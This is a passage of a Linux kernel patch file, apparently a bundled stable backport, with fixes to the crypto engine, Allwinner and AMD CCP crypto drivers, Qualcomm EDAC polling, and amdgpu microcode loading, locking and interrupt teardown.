++	if (unlikely(queue->qlen >= queue->max_qlen))
++		queue->backlog = queue->backlog->prev;
++
+ 	queue->qlen++;
+ 	list_add(&request->list, &queue->list);
+ }
+diff --git a/crypto/crypto_engine.c b/crypto/crypto_engine.c
+index bb8e77077f020..50bac2ab55f17 100644
+--- a/crypto/crypto_engine.c
++++ b/crypto/crypto_engine.c
+@@ -54,7 +54,7 @@ static void crypto_finalize_request(struct crypto_engine *engine,
+ 		}
+ 	}
+ 	lockdep_assert_in_softirq();
+-	req->complete(req, err);
++	crypto_request_complete(req, err);
+ 
+ 	kthread_queue_work(engine->kworker, &engine->pump_requests);
+ }
+@@ -129,9 +129,6 @@ start_request:
+ 	if (!engine->retry_support)
+ 		engine->cur_req = async_req;
+ 
+-	if (backlog)
+-		backlog->complete(backlog, -EINPROGRESS);
+-
+ 	if (engine->busy)
+ 		was_busy = true;
+ 	else
+@@ -214,9 +211,12 @@ req_err_1:
+ 	}
+ 
+ req_err_2:
+-	async_req->complete(async_req, ret);
++	crypto_request_complete(async_req, ret);
+ 
+ retry:
++	if (backlog)
++		crypto_request_complete(backlog, -EINPROGRESS);
++
+ 	/* If retry mechanism is supported, send new requests to engine */
+ 	if (engine->retry_support) {
+ 		spin_lock_irqsave(&engine->queue_lock, flags);
+diff --git a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+index 902f6be057ec6..e97fb203690ae 100644
+--- a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
++++ b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+@@ -151,7 +151,7 @@ static int sun8i_ss_setup_ivs(struct skcipher_request *areq)
+ 		}
+ 		rctx->p_iv[i] = a;
+ 		/* we need to setup all others IVs only in the decrypt way */
+-		if (rctx->op_dir & SS_ENCRYPTION)
++		if (rctx->op_dir == SS_ENCRYPTION)
+ 			return 0;
+ 		todo = min(len, sg_dma_len(sg));
+ 		len -= todo;
+diff --git a/drivers/crypto/ccp/psp-dev.c b/drivers/crypto/ccp/psp-dev.c
+index c9c741ac84421..949a3fa0b94a9 100644
+--- a/drivers/crypto/ccp/psp-dev.c
++++ b/drivers/crypto/ccp/psp-dev.c
+@@ -42,6 +42,9 @@ static irqreturn_t psp_irq_handler(int irq, void *data)
+ 	/* Read the interrupt status: */
+ 	status = ioread32(psp->io_regs + psp->vdata->intsts_reg);
+ 
++	/* Clear the interrupt status by writing the same value we read. */
++	iowrite32(status, psp->io_regs + psp->vdata->intsts_reg);
++
+ 	/* invoke subdevice interrupt handlers */
+ 	if (status) {
+ 		if (psp->sev_irq_handler)
+@@ -51,9 +54,6 @@ static irqreturn_t psp_irq_handler(int irq, void *data)
+ 			psp->tee_irq_handler(irq, psp->tee_irq_data, status);
+ 	}
+ 
+-	/* Clear the interrupt status by writing the same value we read. */
+-	iowrite32(status, psp->io_regs + psp->vdata->intsts_reg);
+-
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/drivers/edac/qcom_edac.c b/drivers/edac/qcom_edac.c
+index c45519f59dc11..2c91ceff8a9ca 100644
+--- a/drivers/edac/qcom_edac.c
++++ b/drivers/edac/qcom_edac.c
+@@ -76,6 +76,8 @@
+ #define DRP0_INTERRUPT_ENABLE           BIT(6)
+ #define SB_DB_DRP_INTERRUPT_ENABLE      0x3
+ 
++#define ECC_POLL_MSEC			5000
++
+ enum {
+ 	LLCC_DRAM_CE = 0,
+ 	LLCC_DRAM_UE,
+@@ -285,8 +287,7 @@ dump_syn_reg(struct edac_device_ctl_info *edev_ctl, int err_type, u32 bank)
+ 	return ret;
+ }
+ 
+-static irqreturn_t
+-llcc_ecc_irq_handler(int irq, void *edev_ctl)
++static irqreturn_t llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ {
+ 	struct edac_device_ctl_info *edac_dev_ctl = edev_ctl;
+ 	struct llcc_drv_data *drv = edac_dev_ctl->dev->platform_data;
+@@ -332,6 +333,11 @@ llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ 	return irq_rc;
+ }
+ 
++static void llcc_ecc_check(struct edac_device_ctl_info *edev_ctl)
++{
++	llcc_ecc_irq_handler(0, edev_ctl);
++}
++
+ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ {
+ 	struct llcc_drv_data *llcc_driv_data = pdev->dev.platform_data;
+@@ -359,29 +365,31 @@ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ 	edev_ctl->ctl_name = "llcc";
+ 	edev_ctl->panic_on_ue = LLCC_ERP_PANIC_ON_UE;
+ 
+-	rc = edac_device_add_device(edev_ctl);
+-	if (rc)
+-		goto out_mem;
+-
+-	platform_set_drvdata(pdev, edev_ctl);
+-
+-	/* Request for ecc irq */
++	/* Check if LLCC driver has passed ECC IRQ */
+ 	ecc_irq = llcc_driv_data->ecc_irq;
+-	if (ecc_irq < 0) {
+-		rc = -ENODEV;
+-		goto out_dev;
+-	}
+-	rc = devm_request_irq(dev, ecc_irq, llcc_ecc_irq_handler,
++	if (ecc_irq > 0) {
++		/* Use interrupt mode if IRQ is available */
++		rc = devm_request_irq(dev, ecc_irq, llcc_ecc_irq_handler,
+ 			      IRQF_TRIGGER_HIGH, "llcc_ecc", edev_ctl);
+-	if (rc)
+-		goto out_dev;
++		if (!rc) {
++			edac_op_state = EDAC_OPSTATE_INT;
++			goto irq_done;
++		}
++	}
+ 
+-	return rc;
++	/* Fall back to polling mode otherwise */
++	edev_ctl->poll_msec = ECC_POLL_MSEC;
++	edev_ctl->edac_check = llcc_ecc_check;
++	edac_op_state = EDAC_OPSTATE_POLL;
+ 
+-out_dev:
+-	edac_device_del_device(edev_ctl->dev);
+-out_mem:
+-	edac_device_free_ctl_info(edev_ctl);
++irq_done:
++	rc = edac_device_add_device(edev_ctl);
++	if (rc) {
++		edac_device_free_ctl_info(edev_ctl);
++		return rc;
++	}
++
++	platform_set_drvdata(pdev, edev_ctl);
+ 
+ 	return rc;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 9776e0b488cf6..011e4fbe27f10 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4483,7 +4483,11 @@ static int amdgpu_device_recover_vram(struct amdgpu_device *adev)
+ 	dev_info(adev->dev, "recover vram bo from shadow start\n");
+ 	mutex_lock(&adev->shadow_list_lock);
+ 	list_for_each_entry(vmbo, &adev->shadow_list, shadow_list) {
+-		shadow = &vmbo->bo;
++		/* If vm is compute context or adev is APU, shadow will be NULL */
++		if (!vmbo->shadow)
++			continue;
++		shadow = vmbo->shadow;
++
+ 		/* No need to recover an evicted BO */
+ 		if (shadow->tbo.resource->mem_type != TTM_PL_TT ||
+ 		    shadow->tbo.resource->start == AMDGPU_BO_INVALID_OFFSET ||
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+index 0c546245793b9..82e27bd4f0383 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+@@ -21,6 +21,8 @@
+  *
+  */
+ 
++#include <linux/firmware.h>
++
+ #include "amdgpu_mes.h"
+ #include "amdgpu.h"
+ #include "soc15_common.h"
+@@ -1423,3 +1425,60 @@ error_pasid:
+ 	kfree(vm);
+ 	return 0;
+ }
++
++int amdgpu_mes_init_microcode(struct amdgpu_device *adev, int pipe)
++{
++	const struct mes_firmware_header_v1_0 *mes_hdr;
++	struct amdgpu_firmware_info *info;
++	char ucode_prefix[30];
++	char fw_name[40];
++	int r;
++
++	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix, sizeof(ucode_prefix));
++	snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes%s.bin",
++		ucode_prefix,
++		pipe == AMDGPU_MES_SCHED_PIPE ? "" : "1");
++	r = amdgpu_ucode_request(adev, &adev->mes.fw[pipe], fw_name);
++	if (r)
++		goto out;
++
++	mes_hdr = (const struct mes_firmware_header_v1_0 *)
++		adev->mes.fw[pipe]->data;
++	adev->mes.uc_start_addr[pipe] =
++		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
++		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
++	adev->mes.data_start_addr[pipe] =
++		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
++		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
++
++	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
++		int ucode, ucode_data;
++
++		if (pipe == AMDGPU_MES_SCHED_PIPE) {
++			ucode = AMDGPU_UCODE_ID_CP_MES;
++			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
++		} else {
++			ucode = AMDGPU_UCODE_ID_CP_MES1;
++			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
++		}
++
++		info = &adev->firmware.ucode[ucode];
++		info->ucode_id = ucode;
++		info->fw = adev->mes.fw[pipe];
++		adev->firmware.fw_size +=
++			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
++			      PAGE_SIZE);
++
++		info = &adev->firmware.ucode[ucode_data];
++		info->ucode_id = ucode_data;
++		info->fw = adev->mes.fw[pipe];
++		adev->firmware.fw_size +=
++			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
++			      PAGE_SIZE);
++	}
++
++	return 0;
++out:
++	amdgpu_ucode_release(&adev->mes.fw[pipe]);
++	return r;
++}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
+index ad980f4b66e19..547ec35691fac 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
+@@ -91,14 +91,12 @@ struct amdgpu_mes {
+ 	struct amdgpu_bo		*ucode_fw_obj[AMDGPU_MAX_MES_PIPES];
+ 	uint64_t			ucode_fw_gpu_addr[AMDGPU_MAX_MES_PIPES];
+ 	uint32_t			*ucode_fw_ptr[AMDGPU_MAX_MES_PIPES];
+-	uint32_t                        ucode_fw_version[AMDGPU_MAX_MES_PIPES];
+ 	uint64_t                        uc_start_addr[AMDGPU_MAX_MES_PIPES];
+ 
+ 	/* mes ucode data */
+ 	struct amdgpu_bo		*data_fw_obj[AMDGPU_MAX_MES_PIPES];
+ 	uint64_t			data_fw_gpu_addr[AMDGPU_MAX_MES_PIPES];
+ 	uint32_t			*data_fw_ptr[AMDGPU_MAX_MES_PIPES];
+-	uint32_t                        data_fw_version[AMDGPU_MAX_MES_PIPES];
+ 	uint64_t                        data_start_addr[AMDGPU_MAX_MES_PIPES];
+ 
+ 	/* eop gpu obj */
+@@ -308,6 +306,7 @@ struct amdgpu_mes_funcs {
+ 
+ int amdgpu_mes_ctx_get_offs(struct amdgpu_ring *ring, unsigned int id_offs);
+ 
++int amdgpu_mes_init_microcode(struct amdgpu_device *adev, int pipe);
+ int amdgpu_mes_init(struct amdgpu_device *adev);
+ void amdgpu_mes_fini(struct amdgpu_device *adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
+index e9b45089a28a6..863b2a34b2d64 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
+@@ -38,6 +38,7 @@ static int amdgpu_sched_process_priority_override(struct amdgpu_device *adev,
+ {
+ 	struct fd f = fdget(fd);
+ 	struct amdgpu_fpriv *fpriv;
++	struct amdgpu_ctx_mgr *mgr;
+ 	struct amdgpu_ctx *ctx;
+ 	uint32_t id;
+ 	int r;
+@@ -51,8 +52,11 @@ static int amdgpu_sched_process_priority_override(struct amdgpu_device *adev,
+ 		return r;
+ 	}
+ 
+-	idr_for_each_entry(&fpriv->ctx_mgr.ctx_handles, ctx, id)
++	mgr = &fpriv->ctx_mgr;
++	mutex_lock(&mgr->lock);
++	idr_for_each_entry(&mgr->ctx_handles, ctx, id)
+ 		amdgpu_ctx_priority_override(ctx, priority);
++	mutex_unlock(&mgr->lock);
+ 
+ 	fdput(f);
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+index 5cb62e6249c23..6e7058a2d1c82 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+@@ -1091,3 +1091,39 @@ void amdgpu_ucode_ip_version_decode(struct amdgpu_device *adev, int block_type,
+ 
+ 	snprintf(ucode_prefix, len, "%s_%d_%d_%d", ip_name, maj, min, rev);
+ }
++
++/*
++ * amdgpu_ucode_request - Fetch and validate amdgpu microcode
++ *
++ * @adev: amdgpu device
++ * @fw: pointer to load firmware to
++ * @fw_name: firmware to load
++ *
++ * This is a helper that will use request_firmware and amdgpu_ucode_validate
++ * to load and run basic validation on firmware. If the load fails, remap
++ * the error code to -ENODEV, so that early_init functions will fail to load.
++ */
++int amdgpu_ucode_request(struct amdgpu_device *adev, const struct firmware **fw,
++			 const char *fw_name)
++{
++	int err = request_firmware(fw, fw_name, adev->dev);
++
++	if (err)
++		return -ENODEV;
++	err = amdgpu_ucode_validate(*fw);
++	if (err)
++		dev_dbg(adev->dev, "\"%s\" failed to validate\n", fw_name);
++
++	return err;
++}
++
++/*
++ * amdgpu_ucode_release - Release firmware microcode
++ *
++ * @fw: pointer to firmware to release
++ */
++void amdgpu_ucode_release(const struct firmware **fw)
++{
++	release_firmware(*fw);
++	*fw = NULL;
++}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
+index 1c36235b4539c..4c20eb410960d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
+@@ -543,6 +543,9 @@ void amdgpu_ucode_print_sdma_hdr(const struct common_firmware_header *hdr);
+ void amdgpu_ucode_print_psp_hdr(const struct common_firmware_header *hdr);
+ void amdgpu_ucode_print_gpu_info_hdr(const struct common_firmware_header *hdr);
+ int amdgpu_ucode_validate(const struct firmware *fw);
++int amdgpu_ucode_request(struct amdgpu_device *adev, const struct firmware **fw,
++			 const char *fw_name);
++void amdgpu_ucode_release(const struct firmware **fw);
+ bool amdgpu_ucode_hdr_version(union amdgpu_firmware_header *hdr,
+ 				uint16_t hdr_major, uint16_t hdr_minor);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+index 0320be4a5fc6c..1f3fdf6cb903e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -3797,7 +3797,8 @@ static int gfx_v9_0_hw_fini(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
+-	amdgpu_irq_put(adev, &adev->gfx.cp_ecc_error_irq, 0);
++	if (amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__GFX))
++		amdgpu_irq_put(adev, &adev->gfx.cp_ecc_error_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gfx.priv_reg_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gfx.priv_inst_irq, 0);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+index f513e2c2e964f..d96ee48e1706a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+@@ -1142,7 +1142,6 @@ static int gmc_v10_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+index 96e0bb5bee78e..2d11e8e7e1235 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+@@ -931,7 +931,6 @@ static int gmc_v11_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 	gmc_v11_0_gart_disable(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+index 67ca16a8027c7..0d9e9d9dd4a1d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+@@ -1898,7 +1898,6 @@ static int gmc_v9_0_hw_fini(void *handle)
+ 	if (adev->mmhub.funcs->update_power_gating)
+ 		adev->mmhub.funcs->update_power_gating(adev, false);
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c b/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
+index a1b751d9ac064..323d68b2124fa 100644
+--- a/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
+@@ -54,6 +54,7 @@ static int jpeg_v3_0_early_init(void *handle)
+ 
+ 	switch (adev->ip_versions[UVD_HWIP][0]) {
+ 	case IP_VERSION(3, 1, 1):
++	case IP_VERSION(3, 1, 2):
+ 		break;
+ 	default:
+ 		harvest = RREG32_SOC15(JPEG, 0, mmCC_UVD_HARVESTING);
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c b/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
+index 067d10073a562..09105029445a8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
+@@ -375,93 +375,6 @@ static const struct amdgpu_mes_funcs mes_v10_1_funcs = {
+ 	.resume_gang = mes_v10_1_resume_gang,
+ };
+ 
+-static int mes_v10_1_init_microcode(struct amdgpu_device *adev,
+-				    enum admgpu_mes_pipe pipe)
+-{
+-	const char *chip_name;
+-	char fw_name[30];
+-	int err;
+-	const struct mes_firmware_header_v1_0 *mes_hdr;
+-	struct amdgpu_firmware_info *info;
+-
+-	switch (adev->ip_versions[GC_HWIP][0]) {
+-	case IP_VERSION(10, 1, 10):
+-		chip_name = "navi10";
+-		break;
+-	case IP_VERSION(10, 3, 0):
+-		chip_name = "sienna_cichlid";
+-		break;
+-	default:
+-		BUG();
+-	}
+-
+-	if (pipe == AMDGPU_MES_SCHED_PIPE)
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes.bin",
+-			 chip_name);
+-	else
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes1.bin",
+-			 chip_name);
+-
+-	err = request_firmware(&adev->mes.fw[pipe], fw_name, adev->dev);
+-	if (err)
+-		return err;
+-
+-	err = amdgpu_ucode_validate(adev->mes.fw[pipe]);
+-	if (err) {
+-		release_firmware(adev->mes.fw[pipe]);
+-		adev->mes.fw[pipe] = NULL;
+-		return err;
+-	}
+-
+-	mes_hdr = (const struct mes_firmware_header_v1_0 *)
+-		adev->mes.fw[pipe]->data;
+-	adev->mes.ucode_fw_version[pipe] =
+-		le32_to_cpu(mes_hdr->mes_ucode_version);
+-	adev->mes.ucode_fw_version[pipe] =
+-		le32_to_cpu(mes_hdr->mes_ucode_data_version);
+-	adev->mes.uc_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
+-	adev->mes.data_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
+-
+-	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
+-		int ucode, ucode_data;
+-
+-		if (pipe == AMDGPU_MES_SCHED_PIPE) {
+-			ucode = AMDGPU_UCODE_ID_CP_MES;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
+-		} else {
+-			ucode = AMDGPU_UCODE_ID_CP_MES1;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
+-		}
+-
+-		info = &adev->firmware.ucode[ucode];
+-		info->ucode_id = ucode;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
+-			      PAGE_SIZE);
+-
+-		info = &adev->firmware.ucode[ucode_data];
+-		info->ucode_id = ucode_data;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
+-			      PAGE_SIZE);
+-	}
+-
+-	return 0;
+-}
+-
+-static void mes_v10_1_free_microcode(struct amdgpu_device *adev,
+-				     enum admgpu_mes_pipe pipe)
+-{
+-	release_firmware(adev->mes.fw[pipe]);
+-	adev->mes.fw[pipe] = NULL;
+-}
+-
+ static int mes_v10_1_allocate_ucode_buffer(struct amdgpu_device *adev,
+ 					   enum admgpu_mes_pipe pipe)
+ {
+@@ -1019,10 +932,6 @@ static int mes_v10_1_sw_init(void *handle)
+ 		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
+ 			continue;
+ 
+-		r = mes_v10_1_init_microcode(adev, pipe);
+-		if (r)
+-			return r;
+-
+ 		r = mes_v10_1_allocate_eop_buf(adev, pipe);
+ 		if (r)
+ 			return r;
+@@ -1059,8 +968,7 @@ static int mes_v10_1_sw_fini(void *handle)
+ 		amdgpu_bo_free_kernel(&adev->mes.eop_gpu_obj[pipe],
+ 				      &adev->mes.eop_gpu_addr[pipe],
+ 				      NULL);
+-
+-		mes_v10_1_free_microcode(adev, pipe);
++		amdgpu_ucode_release(&adev->mes.fw[pipe]);
+ 	}
+ 
+ 	amdgpu_bo_free_kernel(&adev->gfx.kiq.ring.mqd_obj,
+@@ -1229,6 +1137,22 @@ static int mes_v10_1_resume(void *handle)
+ 	return amdgpu_mes_resume(adev);
+ }
+ 
++static int mes_v10_0_early_init(void *handle)
++{
++	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++	int pipe, r;
++
++	for (pipe = 0; pipe < AMDGPU_MAX_MES_PIPES; pipe++) {
++		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
++			continue;
++		r = amdgpu_mes_init_microcode(adev, pipe);
++		if (r)
++			return r;
++	}
++
++	return 0;
++}
++
+ static int mes_v10_0_late_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+@@ -1241,6 +1165,7 @@ static int mes_v10_0_late_init(void *handle)
+ 
+ static const struct amd_ip_funcs mes_v10_1_ip_funcs = {
+ 	.name = "mes_v10_1",
++	.early_init = mes_v10_0_early_init,
+ 	.late_init = mes_v10_0_late_init,
+ 	.sw_init = mes_v10_1_sw_init,
+ 	.sw_fini = mes_v10_1_sw_fini,
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index 6f0e389be5f6a..e3168149ca8f6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -453,84 +453,6 @@ static const struct amdgpu_mes_funcs mes_v11_0_funcs = {
+ 	.misc_op = mes_v11_0_misc_op,
+ };
+ 
+-static int mes_v11_0_init_microcode(struct amdgpu_device *adev,
+-				    enum admgpu_mes_pipe pipe)
+-{
+-	char fw_name[30];
+-	char ucode_prefix[30];
+-	int err;
+-	const struct mes_firmware_header_v1_0 *mes_hdr;
+-	struct amdgpu_firmware_info *info;
+-
+-	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix, sizeof(ucode_prefix));
+-
+-	if (pipe == AMDGPU_MES_SCHED_PIPE)
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes.bin",
+-			 ucode_prefix);
+-	else
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes1.bin",
+-			 ucode_prefix);
+-
+-	err = request_firmware(&adev->mes.fw[pipe], fw_name, adev->dev);
+-	if (err)
+-		return err;
+-
+-	err = amdgpu_ucode_validate(adev->mes.fw[pipe]);
+-	if (err) {
+-		release_firmware(adev->mes.fw[pipe]);
+-		adev->mes.fw[pipe] = NULL;
+-		return err;
+-	}
+-
+-	mes_hdr = (const struct mes_firmware_header_v1_0 *)
+-		adev->mes.fw[pipe]->data;
+-	adev->mes.ucode_fw_version[pipe] =
+-		le32_to_cpu(mes_hdr->mes_ucode_version);
+-	adev->mes.ucode_fw_version[pipe] =
+-		le32_to_cpu(mes_hdr->mes_ucode_data_version);
+-	adev->mes.uc_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
+-	adev->mes.data_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
+-
+-	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
+-		int ucode, ucode_data;
+-
+-		if (pipe == AMDGPU_MES_SCHED_PIPE) {
+-			ucode = AMDGPU_UCODE_ID_CP_MES;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
+-		} else {
+-			ucode = AMDGPU_UCODE_ID_CP_MES1;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
+-		}
+-
+-		info = &adev->firmware.ucode[ucode];
+-		info->ucode_id = ucode;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
+-			      PAGE_SIZE);
+-
+-		info = &adev->firmware.ucode[ucode_data];
+-		info->ucode_id = ucode_data;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
+-			      PAGE_SIZE);
+-	}
+-
+-	return 0;
+-}
+-
+-static void mes_v11_0_free_microcode(struct amdgpu_device *adev,
+-				     enum admgpu_mes_pipe pipe)
+-{
+-	release_firmware(adev->mes.fw[pipe]);
+-	adev->mes.fw[pipe] = NULL;
+-}
+-
+ static int mes_v11_0_allocate_ucode_buffer(struct amdgpu_device *adev,
+ 					   enum admgpu_mes_pipe pipe)
+ {
+@@ -1098,10 +1020,6 @@ static int mes_v11_0_sw_init(void *handle)
+ 		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
+ 			continue;
+ 
+-		r = mes_v11_0_init_microcode(adev, pipe);
+-		if (r)
+-			return r;
+-
+ 		r = mes_v11_0_allocate_eop_buf(adev, pipe);
+ 		if (r)
+ 			return r;
+@@ -1138,8 +1056,7 @@ static int mes_v11_0_sw_fini(void *handle)
+ 		amdgpu_bo_free_kernel(&adev->mes.eop_gpu_obj[pipe],
+ 				      &adev->mes.eop_gpu_addr[pipe],
+ 				      NULL);
+-
+-		mes_v11_0_free_microcode(adev, pipe);
++		amdgpu_ucode_release(&adev->mes.fw[pipe]);
+ 	}
+ 
+ 	amdgpu_bo_free_kernel(&adev->gfx.kiq.ring.mqd_obj,
+@@ -1334,6 +1251,22 @@ static int mes_v11_0_resume(void *handle)
+ 	return amdgpu_mes_resume(adev);
+ }
+ 
++static int mes_v11_0_early_init(void *handle)
++{
++	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++	int pipe, r;
++
++	for (pipe = 0; pipe < AMDGPU_MAX_MES_PIPES; pipe++) {
++		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
++			continue;
++		r = amdgpu_mes_init_microcode(adev, pipe);
++		if (r)
++			return r;
++	}
++
++	return 0;
++}
++
+ static int mes_v11_0_late_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+@@ -1348,6 +1281,7 @@ static int mes_v11_0_late_init(void *handle)
+ 
+ static const struct amd_ip_funcs mes_v11_0_ip_funcs = {
+ 	.name = "mes_v11_0",
++	.early_init = mes_v11_0_early_init,
+ 	.late_init = mes_v11_0_late_init,
+ 	.sw_init = mes_v11_0_sw_init,
+ 	.sw_fini = mes_v11_0_sw_fini,
